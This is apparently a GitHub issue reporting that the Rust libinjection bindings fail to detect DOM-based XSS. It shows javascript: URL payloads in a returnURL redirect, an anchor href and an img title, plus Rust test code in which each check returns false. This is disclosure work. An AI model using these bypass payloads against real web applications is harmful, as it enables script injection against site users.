[SECURITY] Possible DOM Base XSS

[raminfp]

Hi,

Methods for bypass libinjection-rs of DOM base XSS

1- javascript:alert(eval("2*3"));

Senario

PoC : http://example.com/?returnURL=javascript:alert(1);

          var redirectUrl = getUrlParameter('returnURL');
          window.parent.location.href = redirectUrl;

2- a tag when user click button and trigger alert :).

     <a href="javascript:alert(1);"> click me </a>

3- title value

     `<img id="testz" title="javascript:alert(1)">`

        <script>
         document.location.href=window.testz.title;
        </script>

Real example :

source image : https://twitter.com/Milad_Bahari/status/990539191544156160

Source

[dependencies]
json = "0.11.13"
libinjection = "0.1"

#[macro_use]
extern crate json;
extern crate libinjection;

use libinjection::{xss};

fn main() {
    let data = object!{
        "foo" => "javascript:alert(1);",
    };

    let is_xss = xss("javascript:alert(1);").unwrap();
    let is_xss_2 = xss(&data.dump()).unwrap();
    let is_xss_3 = xss("<img id='testz' title='javascript:alert(1)'>").unwrap();

    println!("{}", data); 
    println!("{}", is_xss); // false
    println!("{}", is_xss_2); // false
    println!("{}", is_xss_3); // false

}

Thanks, Ramin - kernel security engineering Best regards,

[yaa110]

Thank you for the report. Please note that this repository is a bindings to libinjection.